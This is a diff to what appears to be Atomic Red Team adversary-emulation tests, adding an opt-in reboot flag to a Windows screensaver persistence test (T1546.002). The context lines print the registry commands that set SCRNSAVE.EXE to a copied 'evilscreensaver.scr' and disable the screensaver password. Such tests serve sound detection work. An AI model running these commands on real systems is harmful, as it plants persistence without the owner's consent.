diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 25f3197d..fe9bbd74 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -38807,6 +38807,11 @@ privilege-escalation: description: Executable binary to use in place of screensaver for persistence type: Path default: C:\Windows\System32\cmd.exe + reboot: + description: Set to non-zero value if you want the test to reboot the system + so that changes take effect + type: Integer + default: 0 executor: command: | reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg @@ -38815,7 +38820,7 @@ privilege-escalation: reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f - shutdown /r /t 0 + if #{reboot} NEQ 0 shutdown /r /t 0 cleanup_command: | reg import %userprofile%\backup.reg del %userprofile%\backup.reg @@ -61441,6 +61446,11 @@ persistence: description: Executable binary to use in place of screensaver for persistence type: Path default: C:\Windows\System32\cmd.exe + reboot: + description: Set to non-zero value if you want the test to reboot the system + so that changes take effect + type: Integer + default: 0 executor: command: | reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg @@ -61449,7 +61459,7 @@ persistence: reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f - shutdown /r /t 0 + if #{reboot} NEQ 0 shutdown /r /t 0 cleanup_command: | reg import %userprofile%\backup.reg del %userprofile%\backup.reg diff --git a/atomics/T1546.002/T1546.002.md b/atomics/T1546.002/T1546.002.md index 7105d9b4..a6acf938 100644 --- a/atomics/T1546.002/T1546.002.md +++ b/atomics/T1546.002/T1546.002.md @@ -34,6 +34,7 @@ This test copies a binary into the Windows System32 folder and sets it as the sc | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_binary | Executable binary to use in place of screensaver for persistence | Path | C:\Windows\System32\cmd.exe| +| reboot | Set to non-zero value if you want the test to reboot the system so that changes take effect | Integer | 0| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) @@ -46,7 +47,7 @@ reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f -shutdown /r /t 0 +if #{reboot} NEQ 0 shutdown /r /t 0 ``` #### Cleanup Commands: